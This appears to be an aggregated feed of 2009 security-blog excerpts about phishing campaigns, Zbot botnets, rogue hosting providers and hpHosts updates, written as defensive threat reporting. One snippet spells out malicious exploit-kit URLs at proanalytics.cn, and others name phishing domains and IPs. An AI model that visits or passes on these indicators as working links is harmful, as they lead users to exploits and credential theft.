Thứ Sáu, 27 tháng 11, 2009

The 31st issue of everybody’s favorite Ubuntu magazine is out! With 9.10 Karmic Koala just about a month old and the next release, Lucid Lynx, already on the horizon and in the news, take a look at what else is going on.This month, we’ve got:- Command and Conquer. - How-To: Program in Python – Part 5, The Perfect Server – Part 1, and Universe of Sound. - My Story – The Conversion. - My Opinion –
There is a lot of buzz surrounding the “New Moon” movie. In fact, there are thousands of websites trying to lure people into watching the movie for free, from the comfort of your home. Let’s mention that the movie is still in theatres Among those sites, there are those almost too goog to be true portals, where the movie is only a click away:Read morehttp://blogs.paretologic.com/malwarediaries/

Thứ Năm, 26 tháng 11, 2009

I wrote a while back (July, August and then again in September, about the Alliance and Leicester botnet, that served to scam the unwitting out of their banking information. Then of course, there was the MSN phishing from the Sun Network range, and later, spilled onto a botnet when myself and Jonathan, kept getting them shut down.Now it seems, both the Alliance and Leicester, and the MSN phishing
I've just received several more Facebook e-mails that point to URL's hosted on a botnet, and both steal your information, load an iFrame to an exploit, and finally, offer you an "update tool", that is the well known Zbot infection.Sadly, Outlook 2007 isn't letting my Outlook Export application work properly, so I've had to grab the IP's and such manually (well, via hpObserver ;)).hpObserver

Chủ Nhật, 22 tháng 11, 2009

Jonathan sent me an e-mail earlier, refering a domain involved in phishing. This particular one however, contains several interesting aspects.Most notably, it not only asks for your Facebook credentials, it also leads to what claims to be a legit software developer, and this "legit" developer, is offering a Conduit toolbar, claiming it to be a "Facebook toolbar". msbitsoftware.com is an Israel

Thứ Tư, 18 tháng 11, 2009

I've received two of these so far, both pointing to two different domains of course, and find them rather intruiging given it's the first time I've seen this method used.The e-mails start off pretty typical of the 419'ers, but then proceed with a link to ask for a donation - and so far, there's no additional infection involved that I can see;E-mail 1:Hello,My name is Marius and I am a student at
Okay, so I completely ruined what used to be a great Rod Stewart song - but it's been worth it. I was alerted by my friend Dee Hughes over at Freeware Home, of a rogue domain one of her visitors came across during a Google search for Outlook Express that led via the Sponsored results (surprise surprise) to expressdownloadz.com (see left).She asked if I could dig up anything on this domain as

Thứ Ba, 17 tháng 11, 2009

Sorry folks, in fixing the last bug I introduced another.* Fixed another bug in view_spammers.php and view_spammers_mail.phpRef: http://temerc.com/forums/viewtopic.php?f=71&t=7606Download:http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool
v0.40 of the SBST (Spambot Search Tool) has now been released.* Fixed bug in view_spammers.php and view_spammers_mail.phpRef: http://temerc.com/forums/viewtopic.php?f=71&t=7606Download:http://support.it-mate.co.uk/?mode=Products&act=DL&p=spambotsearchtool

Chủ Nhật, 15 tháng 11, 2009

Looking up records for AS46636, I noticed something interesting. The Netblock WhoIs showed a reference to "uaonline", but the AS was saying it belonged to NatCoWeb, clearly something was amiss here, as I remember this as being Real International Business Corp just a few months ago.I decided to look further, and got clarification that Real International Business Corp, are indeed NatCoWeb, thanks
Ecatel (AS29073) have been on the radar for quite some time now, and looking at the amount of malicious content on their network, I'm not expecting this to go away any time soon.What I do find interesting, is the newest domains I've come across on their network, appear to be trying (and very badly I might add) to confuse automated analysis by obfuscating the code of the site you're eventually

Thứ Sáu, 13 tháng 11, 2009

WordPress have released a new version folks. MAKE SURE YOU'RE KEEPING YOURS UPTO DATE!!!!2.8.6 fixes two security problems that can be exploited by registered, logged in users who have posting privileges. If you have untrusted authors on your blog, upgrading to 2.8.6 is recommended.The first problem is an XSS vulnerability in Press This discovered by Benjamin Flesch. The second problem,
Seems Malwarebytes have gotten themselves a fan, alongside the fans already out for MalwareDomainList et al. Just with malwaredomainlist2.com (which sporadically redirects via domains such as ask.com now by the way), this one is currently parked.Referred to: whois.above.comBy: whois.internic.netRegistration Service Provided By: ABOVE.COM, INC.Contact: +613.95897946Domain Name:
Just a warning folks. I've just received the following from PlusNet that indicates there's going to be an excessively high amount of traffic this coming weekend, which will see the potential for reduced performance for all of their customers, including those such as myself that have the business package.Service: Network Capacity (ADSL/20CN)Posted: Fri, Nov 13 2009 at 17:27:13Subject: Broadband
As if BT ripping you off by charging a fortune for calling people isn't enough (over £2 for under 3 mins to a US number!!!!), the phishers have come up with a little help for our dear BT management and shareholders, in the form of a phishing scam.I was advised about this a little earlier (sorry folks, was sleeping or would've posted this earlier). I don't have the original headers for the e-mail,

Thứ Năm, 12 tháng 11, 2009

If you've been anywhere online lately, especially Google or the likes, you'll no doubt have noticed or read about, the blackhat SEO campaigns. One of the many ISP's involved, whether deliberately or otherwise, is EuroConnex. This ISP has an excessively large amount of malicious domains currently present within their network.One of the most recent I came across, was actually whilst writing this,

Thứ Tư, 11 tháng 11, 2009

Personally, I don't believe the fine is large enough. Nor do I believe the Tagged CEO's response. Tagged knew exactly what they were doing, and were playing on their "users" (read: victims) not understanding that the company was stealing their contacts list in order to spam such - exactly what some other "social networking" sites do (i.e. Meet Your Messenger, WAYN et al).Tagged.com has paid

Thứ Ba, 10 tháng 11, 2009

I am happy to announce, there is a new hpHosts mirror available at;hphosts.gt500.orgI've also updated and cleaned up the mirror list;http://forum.hosts-file.net/viewtopic.php?f=23&t=6Special thanks to GT500!
Just a note folks, I've been advised that malwaredomainlist2.com has now also been registered, and not by any of us that run the real malwaredomainlist.com website. There's currently no website actually there, it's parked with sedoparking.com, but we're expecting abuse, and most likely the same form as we saw last time.Referred to: whois.above.comBy: whois.internic.netRegistration Service
I am happy to announce, there's now a new server for you to choose from when using the vURL Online service.The mirror for the proxying script used by the server, comes courtesy of fellow researcher GT500 over at the Malwarebytes forums.
Just a note folks, the hpHosts network will be down for approx 15-20 mins (hopefully alot less, depends on how the router behaves with the new firmware) to allow for the upgrading of the routers firmware. This update will start as soon as I've posted this./update 18:02Upgrade complete, and went alot smoother than the last one :o)
From the desk of, here Piradius goes again, comes news of their yet again providing housing to Zbot infrastructure .... sorry Piradius, what was that, you're a legit ISP? Well the evidence we've seen over the months says otherwise I'm afraid.Piradius.net appears to be up to its dark grey hat antics again with a server at 124.217.251.179 which is providing services to the current run of Zbot
Hosting Panama have several ranges that are or have been, involved in malicious activity. The latest of these being 200.106.145.0/24, which is responsible for this little baggage of fun;http://proanalytics.cn/stats.txtThis text file of course, isn't a text file at all, it's a Javascript file that leads to a whole heap of malicious exploit goodness;http://proanalytics.cn/tds/go.php?sid=1http://
I know I shouldn't be laughing, but after all the fanboys going wild with digs at IE etc users, about how "oh so more secure" Firefox is, I just can't help myself. I said this would happen, as did many others, and the fanboys were unable and are still unable, to provide a reasonable defense as to why we were wrong, instead preferring to go into childish playground arguments (ever found a fanboy

Thứ Hai, 9 tháng 11, 2009

Next on the list of cybercrime friendly ISP's, is root eSolutions, who amongst many others, are providing home for a range known as "Financial company "Titan" LTD" (193.169.12.0/23, AS49353 (TITAN)). This range has been the home of many a fake AV, exploits and various other things for longer than I'd like, and seemingly, root eSolutions don't give a hoot. Something we need to change.Just some of
Jonathan has been firing off e-mails to abuse depts for the various ISP's involved in providing hosting to one of the domains, and has sent me an update that includes those that have both responded and taken action, and those that have not.ISP's who have taken action already: 24.117.242.185 - > CableOne = DOWN, or just timing out.77.127.51.53 - > Zahav.net.il = DOWN, or just timing

Chủ Nhật, 8 tháng 11, 2009

If you remember, I wrote a couple days ago, about China based ISP, Sun Network.Jonathan has been e-mailing them since, and they've now gone back to claiming they can't do anything as it doesn't lie within their authority (funny, given they'd already sent their customer an e-mail saying they had 72 hours to remove the malicious content).What is worse however, is that their customer has not only

Thứ Bảy, 7 tháng 11, 2009

99% of you will already be aware of the likes of typo squatters, so I'll refrain from blabbering on about those ones, and instead, use one I came across today, which isn't actually a typo squatter, is "parked", but still contains a nasty surprise.The domain is hostsfile.net, look familiar? Yep, hpHosts is hosts-file.net (notice the difference?). If you made a typo whilst looking for the hpHosts

Thứ Sáu, 6 tháng 11, 2009

What do you get if you cross MSN + scammers + a rogue Chinese ISP? That's right folks, a whole lot of phishing phun!http://hosts-file.net/?s=121.54.17.&view=matchesNB: Those previously at 121.54.174.* moved to .171 after their 174.* IP's were shut off, these will be reflected in the main hpHosts database when someone queries the respective domains report pagesMy friend Jonathan has been tracking
In my previous article, I talked about the Ozdok command and control architecture and its fallback mechanisms in great detail. That article was an attempt to highlight different approaches to take down this botnet theoretically. But when it comes to the actual shutdown, it's far more complex than just finding out the command and control server coordinates and fallback mechanisms. An actual shut

Thứ Năm, 5 tháng 11, 2009

Killing the beast...Part 4 (Ozdok)Ozdok a.k.a Mega-d is one of those botnets that has been very successful flying under the radar over the past few years. Recent stats by Marshal TRACE show Ozdok is currently responsible for about 4.2% of the world's overall SPAM. The question that arises again is who are the guys controlling this botnet, and more importantly from where? I recently conducted a

Thứ Ba, 3 tháng 11, 2009

We've had various phishing botnets over the years, and this one is no different, well, almost. I received several e-mails claiming to be from Facebook, with the following content;facebookDear Facebook user,In an effort to make your online experience safer and more enjoyable, Facebook will be implementing a new login system that will affect all Facebook users. These changes will offer new features

Thứ Hai, 2 tháng 11, 2009

"Serious" over the Malwarebytes forums alerted me to a site that was suspected of ripping off the VirScan.org site (provides a service along the lines of VirusTotal), www.hrppw.com.cn.I fired off an e-mail to the virscan.org guys to see if they knew anything about it and appears they weren't aware of it. I thought I'd upload a file to see how exactly they were doing this, whether they were
Malwarebytes Corporation have recently published information on their blog, concerning the stealing of the Malwarebytes Anti-Malware database by China based, IObit.Malwarebytes has recently uncovered evidence that a company called IOBit based in China is stealing and incorporating our proprietary database and intellectual property into their software. We know this will sound hard to believe,

Chủ Nhật, 1 tháng 11, 2009

A next-generation Web server honeypot project is under way that poses as Web servers with thousands of vulnerabilities in order to gather firsthand data from real attacks targeting Websites. Unlike other Web honeypots, the new open-source Glastopf tool dynamically emulates vulnerabilities attackers are looking for, so it's more realistic and can gather more detailed attack information, according
There seems to be a trend over the past 6 months, of switching from links directly in the phishing e-mails, to having the entire phishing page in the e-mail itself (as an attachment). Others in the security arena have already publicised this for the most part, so I'll skip over the details.I wonder however, why our dear scammer has done this. I know it's to try and bypass phishing and junk